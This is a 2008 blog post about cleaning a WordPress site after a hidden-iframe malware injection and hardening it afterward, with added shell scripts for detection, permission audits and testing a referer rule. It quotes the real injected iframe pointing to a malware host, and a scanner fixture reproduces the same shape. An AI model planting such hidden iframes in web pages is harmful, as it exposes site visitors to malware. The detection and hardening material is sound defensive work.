I woke up this morning to find that my site feed wasn’t validating and XML-RPC was not responding when I tried to update from MarsEdit. A quick “View Source” showed foreign code lodged at the top of my site’s header. I knew instantly that it shouldn’t be there and that something was wrong. The code was <iframe src="http://avwav.com/3332.htm" style="display:none">. Here is a list of malware sites.
The sane first step was to check whether it was infecting the whole site or just the Wordpress install (I’m on Wordpress 2.5.1). After finding it only in the Wordpress-powered section of the site, I did the following to remove the code and to prevent further complications to my Wordpress installation.
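As an added example (not code from the original post), here is a small POSIX shell script that does what the “View Source” check above does, but across every PHP/HTML/JS file in a Wordpress tree: it flags any <iframe> that is hidden with display:none or a zero width/height, which is how this kind of injection stays out of sight. The sample tree it builds, and the bad.example URL in it, are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not from the original post: scan a WordPress install for
# hidden <iframe> injections, using only POSIX sh, find and grep.

# An <iframe> whose attributes hide it: display:none, or a zero width/height
# given either as an attribute (width="0") or CSS (height:0px). grep -i makes
# the match case-insensitive.
HIDDEN_IFRAME_RE="<iframe[^>]*(display[[:space:]]*:[[:space:]]*none|(width|height)[[:space:]]*[=:][[:space:]]*[\"']?0(px)?[\"']?[[:space:];>])"

# Print the path of every PHP/HTML/JS file under $1 that matches, one per line.
list_hidden_iframe_files() {
    find "$1" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' -o -name '*.js' \) \
        -exec grep -l -i -E "$HIDDEN_IFRAME_RE" {} + 2>/dev/null | sort
}

# Number of flagged files under $1 (0 means nothing suspicious was found).
count_hidden_iframe_files() {
    list_hidden_iframe_files "$1" | wc -l | tr -d ' '
}

# Constructed sample tree: a clean theme header, a header carrying an injected
# hidden iframe (the shape described in the post), and a plugin file with a
# normal, visible iframe that must NOT be flagged.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/themes/clean" \
             "$root/wp-content/themes/infected" \
             "$root/wp-content/plugins/embed"
    printf '<?php ?>\n<html><head><title>clean</title></head>\n' \
        > "$root/wp-content/themes/clean/header.php"
    printf '<iframe src="http://bad.example/3332.htm" style="display:none"></iframe>\n<?php ?>\n<html>\n' \
        > "$root/wp-content/themes/infected/header.php"
    printf '<iframe src="https://video.example/embed/1" width="640" height="360"></iframe>\n' \
        > "$root/wp-content/plugins/embed/embed.php"
    echo "$root"
}

# Run against the sample tree when invoked as: sh scan.sh --demo
if [ "${1:-}" = "--demo" ]; then
    root=$(make_sample_tree)
    echo "Flagged files: $(count_hidden_iframe_files "$root")"
    list_hidden_iframe_files "$root" | sed "s|^$root/||"
    rm -rf "$root"
fi
```

Point `list_hidden_iframe_files` at the real install (for example `list_hidden_iframe_files /path/to/wp`) to get the file list; a hit in a theme or plugin file you did not write is the same signal the post describes, and the fix is the same too: replace the install from clean copies rather than trying to edit the injection out.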
PREPARE
- Jot down the list of plugins I need
- Back up the theme
- Back up “wp-config.php”
- Back up and download the database with Wordpress Database Backup
- You should also back up /wp-content/uploads/ if you use Wordpress to upload your files (see below for how I manage my files)
REFRESH
Then I re-did the whole Wordpress installation. I wasn’t worried, because my “uploads” are elsewhere, the database was not infected, and it is backed up every day by mailing it to myself, where Gmail archives it instantly. Here is what I did:
- Delete the whole “wp” folder. Yes, I always make it a point that all the Wordpress install files live inside a separate folder.
- Upload a fresh set of Wordpress files into “wp” (you can use any folder name you like)
- Upload Plugins
- Upload Theme
- Upload “wp-config.php”
That’s it. With a fresh Wordpress install, the injected script/code is gone and my Wordpress installation is back to normal.
EXTRA PRECAUTION
I decided to take some extra precautions and secure my Wordpress installation from here on. Here are a few things I did in addition to installing a fresh copy of Wordpress.
Take care that none of your folders are world-writable
Make sure that none of your folders allow public (world) write access (CHMOD 777). There are times when you need to set a folder to CHMOD 777 (everybody writes), but remember to set it back to 755 (only the owner writes) when it is no longer needed, or at least to CHMOD 775 (owner and group write).
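An added example, not from the original post, of how to audit that advice rather than trust memory: a POSIX shell script that lists every world-writable file or directory under a site tree and, on request, tightens directories to 755 and files to 644. The sample site it builds under mktemp is constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not from the original post: find (and optionally fix)
# world-writable entries in a site tree. Only POSIX sh, find and chmod.

# Print every file or directory under $1 whose "other" write bit is set
# (octal 002). Symlinks are skipped: they report 777 but are not the problem.
find_world_writable() {
    find "$1" -perm -002 ! -type l
}

# Number of world-writable entries under $1 (0 is what you want to see).
count_world_writable() {
    find_world_writable "$1" | wc -l | tr -d ' '
}

# Tighten only the offending entries: directories to 755, files to 644.
# If a folder genuinely needs web-server writes (uploads), prefer 775 with the
# web server's group instead of reopening it to the world.
fix_world_writable() {
    find "$1" -type d -perm -002 ! -type l -exec chmod 755 {} +
    find "$1" -type f -perm -002 ! -type l -exec chmod 644 {} +
}

# Constructed sample site: one folder left at 777 after an upload session and
# one config file at 666, next to correctly set theme files.
make_sample_site() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/uploads" "$root/wp-content/themes/mine"
    : > "$root/wp-content/themes/mine/style.css"
    : > "$root/wp-config.php"
    chmod 777 "$root/wp-content/uploads"            # "everybody writes"
    chmod 666 "$root/wp-config.php"                 # world-writable file
    chmod 755 "$root/wp-content/themes/mine"
    chmod 644 "$root/wp-content/themes/mine/style.css"
    echo "$root"
}

# Run against the sample site when invoked as: sh perms.sh --demo
if [ "${1:-}" = "--demo" ]; then
    root=$(make_sample_site)
    echo "World-writable before fix:"
    find_world_writable "$root" | sed "s|^$root/||"
    fix_world_writable "$root"
    echo "World-writable after fix: $(count_world_writable "$root")"
    rm -rf "$root"
fi
```

On a real install, run `count_world_writable /path/to/site` first and look at the list before fixing anything, so that a folder a plugin legitimately writes to gets 775 with the right group rather than a blanket 755.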
Restrict access to “wp-admin” with .htaccess
It is pretty easy to drop a .htaccess into your “wp-admin” folder so only you or a few of your editors/authors can access that folder. This way, you’ll need two passwords to log in to your Wordpress admin. Anyway, I use Keychain to remember them, so I need to type them just once. This is what I have in my .htaccess file:
AuthUserFile /path-to-file/outside-of-your-site-folder/.htpasswd
AuthName "You need to have an access credential!"
AuthType Basic
require user Brajeshwar
You’ll need a file .htpasswd which should contain a Username:Password pair. Remember, the password is stored hashed here and is not what you type. There are lots of .htpasswd password generators; use one of them.
Note: You can have multiple Username:Password pairs by having as many as you want in separate lines.
Now, drop this .htpasswd file into “/path-to-file/outside-of-your-site-folder/”. See to it that this is not in your site folder (e.g. www, public_html) but outside it, somewhere only you have access to and that is not reachable from the website.
Many Wordpress advocates and experts alike have talked about securing your Wordpress installation, so I won’t go deeper than what I’ve already written above. It is your choice how paranoid you want to get. Nonetheless, as we’re already here, let me give you another bonus tip.
Prevent comment spam by denying access to no-referrer requests
Add this to the rewrite section of your .htaccess:
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_METHOD} POST
RewriteCond %{REQUEST_URI} .wp-comments-post\.php*
RewriteCond %{HTTP_REFERER} !.*brajeshwar.com.* [OR]
RewriteCond %{HTTP_USER_AGENT} ^$
RewriteRule ^(.*)$ http://wordpress.org/ [R=301,L]
Note: Change that brajeshwar.com to your domain.
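As an added example (not code from the original post), the following POSIX shell script mirrors the four conditions of the rewrite rule above so you can run it over request records pulled from your access log before switching the rule on. The records below are constructed; the domain is the one in the rule. It shows the rule's blind spot too: a comment POST with no Referer header at all is redirected away, because the condition is “referer does not contain the domain”, and an empty referer does not.

```shell
#!/bin/sh
# Added example, not from the original post: emulate the comment-spam rewrite
# rule against sample requests to see what it would block.

SITE_DOMAIN="brajeshwar.com"   # the domain from the rule; change to yours

# Mirror the rule's conditions. Args: METHOD URI REFERER USER_AGENT.
# Returns 0 when the rule fires (request is redirected away), 1 when it passes.
comment_post_blocked() {
    method="$1"; uri="$2"; referer="$3"; ua="$4"
    # RewriteCond %{REQUEST_METHOD} POST
    [ "$method" = "POST" ] || return 1
    # RewriteCond %{REQUEST_URI} .wp-comments-post\.php*
    case "$uri" in
        *wp-comments-post.php*) ;;
        *) return 1 ;;
    esac
    # RewriteCond %{HTTP_REFERER} !.*brajeshwar.com.* [OR]
    # Note: this is a plain substring test; an empty referer fails it.
    case "$referer" in
        *"$SITE_DOMAIN"*) referer_ok=1 ;;
        *) referer_ok=0 ;;
    esac
    # RewriteCond %{HTTP_USER_AGENT} ^$   (joined with the previous by OR)
    if [ "$referer_ok" -eq 0 ] || [ -z "$ua" ]; then
        return 0
    fi
    return 1
}

# One-word verdict for a request, for use in a loop over log-derived records.
verdict() {
    if comment_post_blocked "$@"; then echo BLOCK; else echo ALLOW; fi
}

# Constructed records as METHOD|URI|REFERER|USER_AGENT; an empty field means
# the header was absent. Prints one verdict line per record.
run_samples() {
    printf '%s\n' \
        'POST|/wp-comments-post.php|http://brajeshwar.com/some-post/|Mozilla/5.0' \
        'POST|/wp-comments-post.php||Mozilla/5.0' \
        'POST|/wp-comments-post.php|http://brajeshwar.com/some-post/|' \
        'POST|/wp-comments-post.php|http://spam.example/|curl/7.0' \
        'GET|/wp-comments-post.php|http://spam.example/|curl/7.0' \
        'POST|/wp-login.php|http://spam.example/|curl/7.0' |
    while IFS='|' read -r m u r a; do
        printf '%-5s %s %s referer=%s ua=%s\n' \
            "$(verdict "$m" "$u" "$r" "$a")" "$m" "$u" "${r:-<none>}" "${a:-<none>}"
    done
}

# Print the sample verdicts when invoked as: sh referer-rule.sh --demo
if [ "${1:-}" = "--demo" ]; then
    run_samples
fi
```

Two things the emulation makes visible: the referer check is a substring match, so it is a speed bump for bulk spam bots rather than any kind of authentication, and the “no referer” record is blocked along with the spam, so count how many of your own legitimate comment POSTs in the log arrive without a Referer before deciding the trade-off is worth it.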
HOW I MANAGE MY FILES (MEDIA, IMAGES, DOWNLOADS)
As mentioned above, I have my own way of managing files which I feel is effective and makes it easy to move things around if I need to change hosts or any other eventuality arises.
Separate sub-domain for media files (images, audio, video)
Having these files on a separate sub-domain allows me to move them anywhere I like and just do a DNS/IP redirect or a CNAME change to point at the new location. So my articles always point to the sub-domain and thus keep working wherever I move the media files (different location or servers). Currently, they are hosted on Amazon S3. Btw, I’m likely to write an article for Digital Inspiration, for non-geeks and common users, on how to use Amazon S3 the easy way.
What if you’ve used /wp-content/uploads/ throughout and you want to change it now?
Easy! In your .htaccess file, add a permanent redirect with this rule:
RewriteRule ^wp-content/uploads(.*)$ http://media.brajeshwar.com.s3.amazonaws.com$1 [L,R=301]
This now permanently redirects every reference to /wp-content/uploads/ to the corresponding file at the new location.
Backup DB daily or Weekly
If your site is busy and you blog regularly, have a daily backup of your database mailed to you, or use weekly if your site is not that prolific. Wordpress Database Backup can email you a backup daily, weekly or monthly. I have it mailed to my Gmail account and set a filter in Gmail to archive it as it arrives.
Wordpress Theme
Of course, as I always use my own theme, I have a local copy and another on my SVN server. So, always keep a local copy of your theme.
Wordpress Plugins
Don’t even worry about them unless you’ve written one yourself or have modified one. They’re available everywhere, or at least well preserved at Wordpress Plugins.
Keepass
While on the topic of security, let me tell you that I’m a die-hard fan of Keepass and now KeepassX on the Mac. There is even a Linux version, and the encrypted file which contains your passwords works on all platforms. This makes it easy to have access to the plethora of passwords even when you’re away from your Mac and out in the wild where Windows is pretty common. At the time of writing this article, I have accumulated over 2000 passwords used on various sites and applications, and every one of them is different. You can use either a master password or even a key disc to unlock KeepassX, making it rather secure.
That’s pretty much it. Feel free to comment, ask questions and I might be able to discuss further.
Brajeshwar posted this article on Wed, Jul 9th, 2008 at 12:02 pm. Categorized under Asides, General.
COMMENTS
There are 17 responses so far.
Your article was very informative. I guess we need to keep checking our source codes once in a while.
Nice article.
Stumbled!
I recommend changing your WordPress password as well, just in case.
@Joseph
Thanks for the tip.
I think it should be noted that denying no-referrer comments prevents some legitimate posts as well. Norton (and perhaps some other security suites) strips out referrer information from requests, supposedly by default.
Did you investigate at all what the attacker did to make changes to your installation? This could either be a new, previously unpublicized vulnerability in WP. Or did you not entirely lock down your installation like you describe above?
I’d suggest looking for POSTs in your web server’s apache logs.
You should also change all of your passwords, both the .htaccess ones and all of your WP user passwords.
@Michael
I looked around a bit but could not find anything relevant. I do not have access to Mosso’s system, nor do they give us SSH.
So, the best thing I thought was to secure everything and bring things back to normalcy, and to later look around the internet for relevant information. Unluckily, there is little information about the attack, and what exists is few and far between.
Sorry, I’ve, at this time, no idea about how it is caused and where it originates.
Hi,
Thanks for this.
The article was very easy to follow and nice to read. I will definitely link to it on my own wordpress install.
Thanks.
Nice article. Hope you don’t mind that I add a couple of tips myself.
@Shane
Thanks, those tips look real hardcore and bad-ass.
It’s always good to have a little of paranoia with these things (backup db daily, restrict access to admin page, etc.)
Great tips, thanks for sharing.
I’m going to make a preventive plan based on your article. It’s better late than none.
Good article, stumble.
@Hamdani
That’s nice.